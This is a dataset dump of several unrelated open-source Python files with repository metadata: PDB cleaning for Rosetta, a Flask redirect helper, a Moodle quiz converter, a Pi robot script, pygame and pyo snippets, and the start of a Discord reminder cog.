if os.path.isfile( hetatm_pdb_filename ):
# load in the lines
f = open( hetatm_pdb_filename , 'r' )
d = f.readlines()
f.close()
# change to the desired format
converted = []
for line in xrange( len( d ) ):
record = d[line][:6].strip()
resname = d[line][17:20].strip()
# go ahead and just rewrite
if record in ['ATOM' , 'HETATM'] and not resname in one2three.values() and resname in conversion.keys():
new = conversion[resname]
d[line] = d[line][:17] + new.rjust(3) + d[line][20:]
# for records...
temp = resname + ' lines converted to ' + new
if not temp in converted:
converted.append( temp )
# check the record...all to ATOM
if record == 'HETATM':
d[line] = 'ATOM '+ d[line][6:]
# debug output
if converted:
converted = '\n'.join( converted )
print converted
if report_filename:
print 'summary of converted lines written to ' + report_filename
f = open( report_filename , 'w' )
f.write( converted )
f.close()
# write it back
f = open( out_filename , 'w' )
f.writelines( d )
f.close()
else:
print 'No such file named ' + os.path.relpath( hetatm_pdb_filename )
return False
# useful?
# rewrite the water lines in the pdb file to the standard...from settings?
def convert_water_containing_pdb( hetatm_pdb_filename , conversion = WATER_CONVERSION ):
"""
Rewrites all HETATM "water" lines in <hetatm_pdb_filename> to resNames
based on <conversion>
adjust the definition of water (<look_for>) and what to switch to in
settings.py
not currently used...
"""
hetatm_pdb_filename = os.path.abspath( hetatm_pdb_filename )
if os.path.isfile( hetatm_pdb_filename ):
# load in the lines
f = open( hetatm_pdb_filename , 'r' )
d = f.readlines()
f.close()
# change to the desired format
for line in xrange( len( d ) ):
resname = d[line][17:20]
if resname.strip() in WATER_CONVERSION.keys():
d[line] = d[line][:17] + WATER_CONVERSION[resname].rjust(3) + d[line][20:]
# write it back...bad!
f = open( hetatm_pdb_filename , 'w' )
f.writelines( d )
f.close()
else:
print 'No such file named ' + os.path.relpath( hetatm_pdb_filename )
return False
# removes lines from <pdb_file> and writes to <out_file> ending in new
def clean_ATOM_non_new_lines_from_pdb( pdb_filename , out_filename = '' ):
"""
Write all lines in the PDB file <pdb_filename> as long as the last three
characters on the line aren't "new"
used to clean Hydrogens added using Reduce
"""
# get the file rootname
pdb_filename = os.path.abspath( pdb_filename )
root_filename = get_root_filename( pdb_filename )
if not root_filename: # in case it is improper, no "."
root_filename = pdb_filename
# an optional argument for PDB files not ending in .pdb
# if not edit:
# edit = 255
# if the file exists
if os.path.exists( pdb_filename ):
# find all ATOM and TER lines
f = open( pdb_filename , 'r' )
data = f.readlines()
f.close()
good = []
for i in data:
if (i[:5] == 'ATOM ' or i[:4] == 'TER ') and not i.strip()[-3:] == 'new' and i[17:20] in one2three.values():
good.append( i )
# stop condition
if not good:
# tell the user and exit
print 'No ATOM non-new lines in ' + os.path.relpath( pdb_filename )
return False
# default output file to <pdb_filename>.clean.pdb
if not out_filename:
out_filename = root_filename + '.non_new.pdb'
# write the found lines
print 'if the file ' + os.path.relpath( out_filename ) + ' already exists, it will be overwritten!'
f = open( out_filename , 'w' )
f.writelines( good )
f.close()
print 'PDB file ' + os.path.relpath( pdb_filename ) + ' successfully cleaned, non-ATOM lines lacking \"new\" removed\nclean data written to ' + os.path.relpath( out_filename )
return out_filename
else:
print 'No such file or directory named ' + os.path.relpath( pdb_filename )
return False
################################################################################
# MAIN
if __name__ == '__main__':
# parser object for managing input options
parser = optparse.OptionParser()
# essential data
parser.add_option( '-p' , dest = 'pdb_filename' ,
default = '' ,
help = 'the pdb filename to process' )
parser.add_option( '-f' , dest = 'seqformat' ,
default = SEQFORMAT ,
help = 'sequence file format, based on settings (!) and Biopython' )
# the other options for the method...are for interactive use
# hard to manipulate from the commandline...
(options,args) = parser.parse_args()
# check inputs
# no edits/modifications
# kinda silly, but I do this as "my style", easy to modify cleanly
pdb_filename = options.pdb_filename
seqformat = options.seqformat
process_pdb( pdb_filename , seqformat )
################################################################################
################################################################################
# UNFINISHED!!!
# scan for repeated chains and delete them, rewrite it
def clean_redundancy_from_pdb( in_filename , out_filename = '' ):
"""
Not currently supported
"""
print 'This is not currently supported sorry...\nIt should look for redundant copies...though it seems the best way to do this is to read directly from the header...but...even for the same sequence, the PDB file may have slightly different coordinates..so how to choose?\nUse process_pdb instead, a separate method is not supported because of this choice problem'
# rewrite a dna or rna pdb to be rosetta friendly
def convert_nucleic_acids_for_rosetta( nucleic_pdb_filename ):
"""
Not currently supported
"""
print '...still researching...for whatever reason, most DNA PDB coordinates are accepted in Rosetta (and thus do not crash PyRosetta) however, I cannot get RNA loading to work no matter what (!!??!)\nthey can be ~loaded by modifying the database, but this does not seem to actually do anything, although...make_pose_from_sequence can then make RNA polymers, generating a nonstandard ResidueSet also does not work...perhaps cause the lines are ATOM?'
"""
deprecated stuff...just in case...
# f = open( pdb_filename , 'r' )
# complexes = []
# keep_going = True
# while keep_going:
# next line
# line = f.next()
# ...think about this...
# check if chain info, extract the matching subunits
# if 'CHAIN:' in line:
# dupl = line.split( 'CHAIN: ' )[-1].replace( ';' , '' ).strip().split( ', ' ) # ignore ";\n"
# if len( dupl ) > 1:
# complexes.append( dupl )
# stop condition
# elif not ('HEADER' in line or 'TITLE' in line or 'COMPND' in line):
# keep_going = False
# f.close()
# convert complexes
# if complexes:
# if not sum( [len( c ) - len( complexes[0] ) for c in complexes] ):
# all are the same length
# complexes = [''.join( [c[i] for c in complexes] ) for i in xrange( len( complexes[0] ) )]
# else:
# uh oh...
# could be all should be unique...which puts us in exception land anyway
# assume that last listed are aberrantly unpaired
# lowest = min( [len( c ) for c in complexes] )
# temp = [''.join( [c[i] for c in complexes] ) for i in xrange( lowest )]
# for c in complexes:
# temp += c[lowest:]
# complexes = temp
# shutil.copy( seq_filename , seqid2 )
# extract_protein_sequence_from_pdb( temp , '' + seqid + '.fa' , seqid , model , chain )
# so...this Biopython object just doesn't work...
# make a new selection
# selection = Select()
# selection.accept_model( i )
# for l in c:
# selection.accept_chain( l )
# return the filename of the "best" PDB made for Rosetta
# also return PDB numbering map?
# if has_nucleic:
# pdb_filename = root_name + '/' + pdb_filename
# else:
# pdb_filename = root_name + '/' + root_name + '.clean.pdb'
# extract numbering of the best
# pdb_map , reverse_map = extract_numbering_map_from_pdb( pdb_filename , pdb_filename[:-4] + '_numbering_map.txt' )
# uh oh, bug...dont wanna fix now
# until this is proper, leave this to Rosetta...
# return pdb_filename #, pdb_map
# if not chain:
# chain = pdb.child_dict.keys()[0]
# copy the chain
# convert the model into a Structure, for getting the sequence
# for_seq = Structure( 'temp' )
# ...oh yeah...must be model 0 and up >:[
# temp_model = Model( 0 )
# for_seq.add( temp_model )
# for ch in pdb.child_dict.keys():
# copy it all over directly
# for_seq[0].add( pdb[ch] )
# extract the sequence as a Biopython Seq object
# gap regions marked as "|"
# seq_builder = PPBuilder()
# pp = seq_builder.build_peptides( for_seq )
# seq = Seq( '' , ProteinAlphabet )
# for frag in pp:
# seq += frag.get_sequence() + '|' # already a Biopython Seq
# or...just do this...
# from making sequences for subdirectories...
# temp_seq = SeqRecord( Seq( temp_seq , protein_alphabet ) )
# temp_seq.id = os.path.split( root_name )[-1] + ' chain ' + chain
# temp_seq.description = '(from model ' + str( model + 1 ) + ')'
"""
|
gpl-2.0
| 6,684,947,784,690,174,000
| 40.890396
| 461
| 0.522973
| false
| 3.198708
| false
| false
| false
|
jordifierro/abidria-api
|
experiences/entities.py
|
1
|
2739
|
class Experience:
def __init__(self, title, description, author_id,
author_username=None, id=None, picture=None, is_mine=False, is_saved=False):
self._id = id
self._title = title
self._description = description
self._picture = picture
self._author_id = author_id
self._author_username = author_username
self._is_mine = is_mine
self._is_saved = is_saved
@property
def id(self):
return self._id
@property
def title(self):
return self._title
@property
def description(self):
return self._description
@property
def picture(self):
return self._picture
@property
def author_id(self):
return self._author_id
@property
def author_username(self):
return self._author_username
@property
def is_mine(self):
return self._is_mine
@property
def is_saved(self):
return self._is_saved
def builder(self):
return Experience.Builder(self)
def __eq__(self, other):
return self.__dict__ == other.__dict__
class Builder:
def __init__(self, experience):
self._id = experience.id
self._title = experience.title
self._description = experience.description
self._picture = experience.picture
self._author_id = experience.author_id
self._author_username = experience.author_username
self._is_mine = experience.is_mine
self._is_saved = experience.is_saved
def id(self, id):
self._id = id
return self
def title(self, title):
self._title = title
return self
def description(self, description):
self._description = description
return self
def picture(self, picture):
self._picture = picture
return self
def author_id(self, author_id):
self._author_id = author_id
return self
def author_username(self, author_username):
self._author_username = author_username
return self
def is_mine(self, is_mine):
self._is_mine = is_mine
return self
def is_saved(self, is_saved):
self._is_saved = is_saved
return self
def build(self):
return Experience(id=self._id, title=self._title, description=self._description,
picture=self._picture, author_id=self._author_id,
author_username=self._author_username, is_mine=self._is_mine,
is_saved=self._is_saved)
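# A minimal usage sketch of the builder above (illustrative values only,
# guarded so importing this module is unaffected):
if __name__ == '__main__':
    experience = Experience(title='Trip', description='A walk', author_id='1')
    saved_copy = experience.builder().is_saved(True).build()
    assert saved_copy.is_saved and saved_copy.title == 'Trip'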
|
mit
| -958,076,121,102,915,600
| 26.39
| 93
| 0.551661
| false
| 4.403537
| false
| false
| false
|
redCOR-Public/PiBot-A
|
robot-oa.py
|
1
|
1993
|
#!/usr/bin/python
# ========================================================
# Python script for PiBot-A: obstacle avoidance
# Version 1.0 - by Thomas Schoch - www.retas.de
# ========================================================
from __future__ import print_function #+# only needed when using print!
from pololu_drv8835_rpi import motors, MAX_SPEED
from time import sleep
import RPi.GPIO as GPIO
# Signal handler for SIGTERM
import signal, sys
def sigterm_handler(signal, frame):
motors.setSpeeds(0, 0)
sys.exit(0)
signal.signal(signal.SIGTERM, sigterm_handler)
# GPIO pins of sensors
GPIO.setmode(GPIO.BCM)
GPIO_right = 21
GPIO_middle = 26
GPIO_left = 20
# Configure sensors as input
GPIO.setup(GPIO_right, GPIO.IN)
GPIO.setup(GPIO_middle, GPIO.IN)
GPIO.setup(GPIO_left, GPIO.IN)
try:
# Start moving forward
motors.setSpeeds(MAX_SPEED, MAX_SPEED)
while True: # Main loop
# Read sensor input (positive logic)
INPUT_right = not GPIO.input(GPIO_right)
INPUT_middle = not GPIO.input(GPIO_middle)
INPUT_left = not GPIO.input(GPIO_left)
# Set motor speeds dependent on sensor input
if INPUT_left and INPUT_right:
            # Obstacle immediately ahead: move a bit backward,
            # turn left a little bit and then proceed forward
motors.setSpeeds(-200, -200)
sleep (1)
motors.setSpeeds(-200, 200)
sleep (0.3)
motors.setSpeeds(MAX_SPEED, MAX_SPEED)
elif INPUT_middle: # turn left
motors.setSpeeds(100, MAX_SPEED)
elif INPUT_left: # turn right
motors.setSpeeds(MAX_SPEED, 200)
elif INPUT_right: # turn left
motors.setSpeeds(200, MAX_SPEED)
else:
# No sensor input: drive forward
motors.setSpeeds(MAX_SPEED, MAX_SPEED)
# Repeat this loop every 0.1 seconds
sleep (0.1)
finally:
# Stop motors in case of <Ctrl-C> or SIGTERM:
motors.setSpeeds(0, 0)
|
mit
| 6,732,276,785,605,981,000
| 28.308824
| 58
| 0.601606
| false
| 3.39523
| false
| false
| false
|
mattvonrocketstein/smash
|
smashlib/plugins/cmd_env.py
|
1
|
1353
|
""" smashlib.plugins.env_command
"""
import os
from smashlib import get_smash
from smashlib.plugins import Plugin
from smashlib.patches.base import PatchMagic
from smashlib.completion import smash_env_complete
env_completer = lambda himself, event: smash_env_complete(event.symbol)
env_regex = r'env [A-Za-z0-9_]+$'
class PatchEnv(PatchMagic):
"""
Patches builtin "env" command to add support for wildcard queries.
Example:
smash$ env XTERM*
{ 'XTERM_LOCALE': 'en_US.UTF-8',
'XTERM_SHELL': '/bin/bash',
'XTERM_VERSION': 'XTerm(297)' }
"""
name = 'env'
def __call__(self, parameter_s=''):
split = '=' if '=' in parameter_s else ' '
bits = parameter_s.split(split)
if len(bits) == 1 and bits[0]:
varname = bits[0]
if varname[-1].endswith('*'):
return dict([[k, v] for k, v in os.environ.items()
if k.startswith(varname[:-1])])
return self.original(parameter_s)
class EnvCommand(Plugin):
verbose = True
def init(self):
self.contribute_patch(PatchEnv)
self.contribute_completer(
env_regex, env_completer)
def load_ipython_extension(ip):
""" called by %load_ext magic"""
    return EnvCommand(ip).install()
|
mit
| -4,364,809,888,031,154,000
| 25.019231
| 74
| 0.589061
| false
| 3.617647
| false
| false
| false
|
teknologkoren/teknologkoren-se
|
teknologkoren_se/util.py
|
1
|
2092
|
from urllib.parse import urlparse, urljoin
from flask import g, request, session, url_for
from teknologkoren_se import app
def paginate(content, page, page_size):
"""Return a page of content.
    Calculates which items appear on a specific page based on the page
    number and how many objects there are per page.
"""
start_index = (page-1) * page_size
end_index = start_index + page_size
pagination = content[start_index:end_index]
return pagination
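# e.g. (a small sanity sketch kept as comments; values are illustrative):
#     paginate(list(range(10)), page=1, page_size=4)  # -> [0, 1, 2, 3]
#     paginate(list(range(10)), page=3, page_size=4)  # -> [8, 9]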
def url_for_other_page(page):
"""Return url for a page number."""
args = request.view_args.copy()
args['page'] = page
return url_for(request.endpoint, **args)
def is_safe_url(target):
"""Tests if the url is a safe target for redirection.
    Does so by checking that the url is still using http or https
    and that the url is still our site.
"""
test_url = urlparse(urljoin(request.host_url, target))
return test_url.scheme in ('http', 'https') and \
test_url.netloc in app.config['ALLOWED_HOSTS']
def get_redirect_target():
"""Get where we want to redirect to.
Checks the 'next' argument in the request and if nothing there, use
the http referrer. Also checks whether the target is safe to
redirect to (no 'open redirects').
"""
for target in (request.values.get('next'), request.referrer):
if not target:
continue
if target == request.url:
continue
if is_safe_url(target):
return target
def bp_url_processors(bp):
@bp.url_defaults
def add_language_code(endpoint, values):
if not values.get('lang_code', None):
values['lang_code'] = getattr(g, 'lang_code', None) or \
session.get('lang_code')
@bp.url_value_preprocessor
def pull_lang_code(endpoint, values):
lang_code = values.pop('lang_code')
if lang_code in ('sv', 'en'):
# Valid lang_code, set the global lang_code and cookie
g.lang_code = lang_code
session['lang_code'] = g.lang_code
|
mpl-2.0
| 5,092,879,950,161,629,000
| 30.223881
| 71
| 0.630497
| false
| 3.831502
| false
| false
| false
|
SDeans0/Moodle
|
matchToCloze.py
|
1
|
7517
|
# Written by Sam Deans.
# Twitter/GitHub: @sdeans0
# Licensed under the Apache License, Version 2.0 (see below)
# This program is for turning matching type Moodle questions to Cloze type questions in
# Moodle xml format.
# Run it from the command line by importing the module and running the
# matchToCloze.main('filename') function.
import xml.etree.ElementTree as ET
from random import random
def main(filename):
'''This takes a Moodle xml document and writes a new one with the matching type questions
from the old one parsed as Clozes'''
root = loadXML(filename)
questions = getQuestions(root)
answers = getAnswers(root)
stems = getStems(root)
gotName = getName(root)
gotGeneralFeedback = getGeneralFeedback(root)
gotPenalty = getPenalty(root)
gotHidden = getHidden(root)
quiz = ET.Element('quiz')
for index in range(len(gotName)):
wrappedClozeText = clozeSyntactify(questions[index],answers[index], stems[index])
quiz = clozeSkeleton(quiz,gotName[index],wrappedClozeText,gotGeneralFeedback[index],gotPenalty[index],gotHidden[index])
newFileName = changeFileName(filename)
output = ET.ElementTree(quiz)
output.write(newFileName, method = 'html')
# It might be worth importing xml.minidom to make a more neatly formatted XML document
# - this does not seem to be a problem in Moodle though
def loadXML(filename):
'''Loads and xml file and returns the root of the tree'''
tree = ET.parse(filename)
root = tree.getroot()
return root
def changeFileName(filename):
'''Alters the filename inputted to reflect that the output is of Clozes derived from
matching type questions'''
newFileName = filename[:-4] + '-Match-to-Cloze.xml'
return newFileName
def getQuestions(root):
'''Returns the text of each matching subquestions in a nested list:
[[Subquestions from Q1],[Subquestions from Q2],etc]'''
questions = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
subquestions = []
for element in root[index].findall('subquestion'):
subquestions.append(element[0].text[3:-4])
questions.append(subquestions)
return questions
def getAnswers(root):
'''Returns the answers to each subquestion in a nested list:
[[Answers to subquestions from Q1],[Answers to subquestions from Q2],etc]'''
answers = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
subquestions = []
for subquestion in root[index].findall('subquestion'):
for answer in subquestion.findall('answer'):
subquestions.append(answer[0].text)
answers.append(subquestions)
return answers
def getName(root):
'''Returns a list of the titles of each matching question'''
names = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
names.append(root[index][0][0].text)
return names
def getStems(root):
'''Returns the content of the "Question Text" box which explains the theme of the
subquestions'''
stems = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
stems.append(root[index][1][0].text)
print stems
return stems
def getGeneralFeedback(root):
'''Returns the content of the "General Feedback" box which explains the solutions to
the subquestions'''
genFeedbacks = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
genFeedbacks.append(root[index][2][0].text)
return genFeedbacks
def getPenalty(root):
'''Returns a list of the penalties for multiple tries (percent of whole marks)
for each matching question'''
penalties = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
penalties.append(root[index][4].text)
return penalties
def getHidden(root):
'''Returns a list of whether each question is hidden (0 or 1)'''
hiddens = []
for index in range(0,len(root)):
if root[index].attrib == {'type':'matching'}:
hiddens.append(root[index][4].text)
return hiddens
def clozeSyntactify(question, answers, stem): #Questions and answers are lists of the same length
'''Takes the list of subquestions, answers to these, and the overall stem of a matching
question and returns the text of a Cloze analog with newlines between each question'''
clozeExpressionList = []
if len(question) != len(answers):
        print 'Error: the number of subquestions does not match the number of answers'
for index in range(len(answers)):
answerList = []
for item in answers:
if item == answers[index]:
continue
else:
answerList.append(item)
clozeExpression = '<p><br>' + question[index] + ' {1:MC:=%s' % (answers[index])
for item in answerList:
clozeExpression += '~%s' % (item)
clozeExpression += '}</p>\n'
clozeExpressionList.append(clozeExpression)
clozeText = stem + ' \n <br>' + ''.join(clozeExpressionList)
return clozeText
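# example (sketch kept as comments; strings are illustrative):
#     clozeSyntactify( ['Capital of France?'] , ['Paris'] , 'Geography' )
# returns the stem plus one embedded multiple-choice item per subquestion:
#     'Geography \n <br><p><br>Capital of France? {1:MC:=Paris}</p>\n'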
def safeHTML(clozeText):
'''Designed to add a CDATA tag to the Cloze text'''
# This needs some attention - it might be better to work this in terms of forming an
# element instance rather than adding plain text.
    wrappedClozeText = '<![CDATA[' + clozeText + ']]>'
return wrappedClozeText
def clozeSkeleton(quiz,gotName,wrappedClozeText,gotGeneralFeedback,gotPenalty,gotHidden):
'''clozeSkeleton takes the cloze text, the name, the general feedback, penalty and
whether the question is hidden, and creates an element which is a full cloze question
    in Moodle XML format. It builds this as a sub element of the quiz entered.'''
    serialNumber = int(6 * 10**6 + random() * 10**4) #At some point in the future this could
# become a bug. Just make it 10**7 or 10**8 or something to avoid the indexing being
# the same. Could replace with hash('gotName')
comment = ET.Comment(' question: %d ' % (serialNumber))
quiz.append(comment)
question = ET.SubElement(quiz, 'question', {'type':'cloze'})
name = ET.SubElement(question, 'name')
nametext = ET.SubElement(name, 'text')
nametext.text = gotName
questiontext = ET.SubElement(question, 'questiontext')
questiontexttext = ET.SubElement(questiontext, 'text')
questiontexttext.text = wrappedClozeText
generalfeedback = ET.SubElement(question, 'generalfeedback')
generalfeedbacktext = ET.SubElement(generalfeedback, 'text')
generalfeedbacktext.text = gotGeneralFeedback
penalty = ET.SubElement(question, 'penalty')
penalty.text = gotPenalty
hidden = ET.SubElement(question, 'hidden')
hidden.text = gotHidden
return quiz
# Copyright 2015 Sam Deans
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
|
apache-2.0
| -6,817,513,452,035,199,000
| 37.352041
| 127
| 0.673407
| false
| 3.792634
| false
| false
| false
|
joereynolds/Mr-Figs
|
src/game.py
|
1
|
1318
|
import pygame
import json
import src.config as config
from src.user_data import UserData
class Game(object):
def __init__(self, fps):
self.done = False
self.fps = fps
self.clock = pygame.time.Clock()
def run(self, scene):
"""Our main function call. inits pygame, starts our fps clock,
and then begins our main loop
@fps = The fps you desire for the program
@scene = The scene from environment.py that you wish to use
        for processing, rendering, and updating.
"""
pygame.init()
pygame.display.set_caption(config.game_title)
with open(UserData.FULL_PATH) as user_config:
game_data = json.load(user_config)
if game_data['settings']['music']:
pygame.mixer.pre_init(44100, -16, 2, 512)
pygame.mixer.init()
pygame.mixer.music.load('./assets/audio/music/carmack.ogg')
pygame.mixer.music.play(-1)
delta_time = 0
self.clock.tick(self.fps)
while not self.done:
scene.process_input()
scene.update(delta_time)
scene.render()
scene = scene.next
pygame.display.flip()
delta_time = self.clock.tick(self.fps) / 1000.0
pygame.quit()
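# A minimal usage sketch (kept as comments; TitleScene is hypothetical, a
# real Scene implementation with process_input/update/render/next from
# environment.py is required to actually run this):
#     game = Game(fps=60)
#     game.run(TitleScene())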
|
gpl-3.0
| 129,886,711,976,486,270
| 28.288889
| 71
| 0.575873
| false
| 3.865103
| false
| false
| false
|
Ezra/qwertonic
|
music.py
|
1
|
2072
|
###music.py
###Created by Joseph Rollinson, JTRollinson@gmail.com
###Last Modified: 12/07/11
###Requires: pyo
###Turns pyo into a note class that is very easy to run.
###Also contains functions to run pyo music server.
import pyo
class note(object):
'''creates a note that can be played'''
def __init__(self,frequency=440, attack=.01, decay=.2, sustain=.5, release=.1, duration=1, mul=1):
#some of this might not need to be saved later, for space saving.
self.frequency = frequency
self.attack = attack
self.decay = decay
self.sustain = sustain
self.release = release
self.duration = duration
self.mul = mul
self.envelope = pyo.Adsr(attack = attack,
decay = decay,
sustain = sustain,
release = release,
dur = duration,
mul = mul)
self.mod = pyo.Sine(freq = 0, mul = 25)
self.wave = pyo.Sine(freq = self.frequency + self.mod, mul = self.envelope)
self.wave.out()
def play(self,modulation=0):
'''plays the note'''
self.mod.setFreq(modulation)
self.wave.setFreq(self.frequency+self.mod)
self.envelope.play()
def stop(self):
self.envelope.stop()
def setFrequency(self,frequency):
'''sets the frequency of the note'''
        self.frequency = frequency
##def getNotes():
## '''returns a list of notes from middle C to the next B'''
## return map( lambda frequency: note(frequency), freqs)
def musicServer():
'''Returns a music server'''
s = pyo.Server()
s.setVerbosity(2)
s.boot()
return s
def startServer(server):
server.start()
def stopServer(server):
server.stop()
server.shutdown()
def guiMusicServer(server):
'''displays music server's gui'''
server.gui(locals())
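# A minimal usage sketch (kept as comments; requires a working pyo audio
# backend, and the frequency/modulation values are illustrative):
#     s = musicServer()
#     startServer(s)
#     a4 = note(frequency=440, duration=1)
#     a4.play(modulation=5)
#     stopServer(s)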
|
bsd-2-clause
| -5,588,362,250,769,846,000
| 31.419355
| 102
| 0.543919
| false
| 3.801835
| false
| false
| false
|
yuanagain/seniorthesis
|
src/2017-04-06.py
|
1
|
6190
|
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import math
import numdifftools as nd
default_lambda_1, default_lambda_2, default_lambda_3 = 0.086, 0.141, 0.773
default_start = (0.372854105052, 0.393518965248, -0.0359026080443, -0.216701666067)
x_0 = default_start
res = 0.01
dt = res
def quad_sq_distance(x, y):
"""Computes the squared distance"""
dists = [ x[i] - y[i] for i in range(len(x) )]
dists = [ dists[i]**2 for i in range(len(x) )]
return sum(dists)
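# quick sanity check of the helper above (illustrative values):
# (0-1)^2 + (0-2)^2 + (0-3)^2 + (0-4)^2 == 1 + 4 + 9 + 16 == 30
assert quad_sq_distance((0, 0, 0, 0), (1, 2, 3, 4)) == 30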
def plot_quad(ws, xs, ys, zs, plot_type = 0, txt = ""):
if plot_type == 0:
print("Plotting Double Plot Quad Viz")
plt.figure(1)
plt.subplot(2, 1, 1)
plt.subplots_adjust(top=0.85)
plt.plot(xs, ws)
#plt.yscale('linear')
plt.title('xy')
plt.grid(True)
#plt.gca().set_aspect('equal')
plt.subplot(2, 1, 2)
plt.plot(ys, zs)
#plt.yscale('linear')
plt.title('wz')
plt.grid(True)
#plt.gca().set_aspect('equal')
plt.suptitle(txt, fontsize=14)
plt.show()
elif plot_type == 1:
print("Plotting Overlain Double Plot Quad Viz")
plt.figure(1)
plt.plot(xs, ws)
plt.plot(ys, zs)
#plt.yscale('linear')
plt.title('x-w, y-z')
plt.grid(True)
#plt.gca().set_aspect('equal')
plt.suptitle(txt, fontsize=14)
plt.show()
elif plot_type == 2:
print("Plotting Sphere Plot Quad Viz")
fig = plt.figure()
ax = fig.gca(projection='3d')
plt.subplots_adjust(top=0.85)
plt.suptitle(txt, fontsize=14)
        # quad_distance() was never defined; assuming the pointwise
        # Euclidean norm of the (w, x, y, z) trajectory was intended
        qdist = np.sqrt(np.square(ws) + np.square(xs) + np.square(ys) + np.square(zs))
ws = np.divide(ws, qdist)
xs = np.divide(xs, qdist)
ys = np.divide(ys, qdist)
zs = np.divide(zs, qdist)
ax.plot(xs, ys, zs)
ax.set_xlabel("X Axis")
ax.set_ylabel("Y Axis")
ax.set_zlabel("Z Axis")
ax.set_title("Nonrigorous Solution")
plt.show()
else:
print("Invalid Plot Type")
def experiment_1(start_pt = default_start,
T = 1,
lmbda = [default_lambda_1, default_lambda_2, default_lambda_3],
res = 0.001,
expmt = "search"):
## define evaluation function
def dots(x_0, lmbda):
"""
dz1/dt = lambda_2 * z1^2 - (lambda_2 + lambda_3) * z1 * z2
dz2/dt = lambda_1 * z2^2 - (lambda_1 + lambda_3) * z1 * z2
http://www.math.kit.edu/iag3/~herrlich/seite/wws-11/media/wws-talk-valdez.pdf
"""
x_1 = x_0[0]
y_1 = x_0[1]
x_2 = x_0[2]
y_2 = x_0[3]
# print(lmbda)
lambda_1 = lmbda[0]
lambda_2 = lmbda[1]
lambda_3 = lmbda[2]
x_1_dot = lambda_2 * (x_1**2 - y_1**2) - (lambda_2 + lambda_3) * (x_1*x_2 - y_1*y_2)
y_1_dot = 2 * lambda_2 * x_1 * y_1 - (lambda_2 + lambda_3) * (x_1*y_2 + y_1*x_2)
x_2_dot = lambda_1 * (x_2**2 - y_2**2) - (lambda_1 + lambda_3) * (x_1*x_2 - y_1*y_2)
y_2_dot = 2 * lambda_1 * x_2 * y_2 - (lambda_1 +lambda_3) * (x_1*y_2 + y_1*x_2)
return [x_1_dot, y_1_dot, x_2_dot, y_2_dot]
def f(x_0, lmbda, T = 1):
"""Find f(x_0 + T)"""
### TODO: refactor, make into array, then transpose
stepCnt = math.ceil(T / dt)
# Need one more for the initial values
ws = np.empty((stepCnt + 1, ))
xs = np.empty((stepCnt + 1, ))
ys = np.empty((stepCnt + 1, ))
zs = np.empty((stepCnt + 1, ))
# Setting initial values
x_1 = x_0[0]
y_1 = x_0[1]
x_2 = x_0[2]
y_2 = x_0[3]
ws[0], xs[0], ys[0], zs[0] = x_1, y_1, x_2, y_2
# Stepping through "time".
for i in range(stepCnt):
derivs = dots([ ws[i], xs[i], ys[i], zs[i] ], lmbda )
ws[i + 1] = ws[i] + (derivs[0] * dt)
xs[i + 1] = xs[i] + (derivs[1] * dt)
ys[i + 1] = ys[i] + (derivs[2] * dt)
zs[i + 1] = zs[i] + (derivs[3] * dt)
return [ ws[-1], xs[-1], ys[-1], zs[-1] ]
def g(x_0, lmbda, T = 1):
"""objective function"""
return quad_sq_distance( f(x_0, lmbda, T), f(x_0, lmbda, 0) )
def g_T(x_0):
"""g instantiated with a fixed period"""
return g(x_0, lmbda, T)
def newton_search(x_0, T = 1, N = 25):
x = x_0
hessian = nd.core.Hessian(g_T)
jacobian = nd.core.Jacobian(g_T)
for i in range(N):
adjust = np.matmul(np.linalg.inv(hessian(x)), np.transpose( jacobian(x)))
adjust = np.transpose(adjust)[0]
#print(x)
#print(adjust)
            # list_subtract() was never defined; elementwise subtraction assumed
            x = list(np.subtract(x, adjust))
print(g_T(x))
print(x)
def plot_sim_path(x_0, T):
stepCnt = math.ceil(T / dt)
# Need one more for the initial values
ws = np.empty((stepCnt + 1,))
xs = np.empty((stepCnt + 1,))
ys = np.empty((stepCnt + 1,))
zs = np.empty((stepCnt + 1,))
# Setting initial values
x_1 = x_0[0]
y_1 = x_0[1]
x_2 = x_0[2]
y_2 = x_0[3]
ws[0], xs[0], ys[0], zs[0] = x_1, y_1, x_2, y_2
# Stepping through "time".
for i in range(stepCnt):
# Derivatives of the W, X, Y, Z state
derivs = dots([ ws[i], xs[i], ys[i], zs[i] ], lmbda )
ws[i + 1] = ws[i] + (derivs[0] * dt)
xs[i + 1] = xs[i] + (derivs[1] * dt)
ys[i + 1] = ys[i] + (derivs[2] * dt)
zs[i + 1] = zs[i] + (derivs[3] * dt)
plot_quad(ws, xs, ys, zs, 0)
if expmt == 'search':
newton_search(start_pt)
if expmt == 'plot':
plot_sim_path(x_0, T)
experiment_1((10.2,
9.3,
14.4,
12.2) , expmt = 'plot')
experiment_1((4.2, 3.3, 4.4, 2.2),
T = 10000,
lmbda = [0.086, 0.141, 0.773],
expmt = 'plot')
experiment_1((4.2, 3.3, 4.4, 2.2),
T = 1000,
lmbda = [0.086, 0.141, 0.773],
expmt = 'search')
|
mit
| 6,692,264,478,511,544,000
| 26.757848
| 92
| 0.47609
| false
| 2.722076
| false
| false
| false
|
Maverun/Nurevam
|
Bot/cogs/remind.py
|
1
|
14685
|
from datetime import datetime, timedelta
from discord.ext import commands
from .utils import utils
import traceback
import asyncio
import discord
import pytz
loop_list = {}
class Remind(commands.Cog): #This is to remind user about task they set.
def __init__(self,bot):
self.bot = bot
self.redis = bot.db.redis
self.loop = asyncio.get_event_loop()
self.loop_reminder_timer = self.loop.create_task(self.timer())
def cog_unload(self):
self.loop_reminder_timer.cancel()
for val in loop_list.values():
val.cancel()
utils.prPurple("unload remindme task")
async def clear(self,gid,uid,mid):
lp = loop_list.pop(mid,None) #pop out of list. Cast int just in case
if lp is not None:
lp.cancel() #just in case it was running and someone CANCEL IT
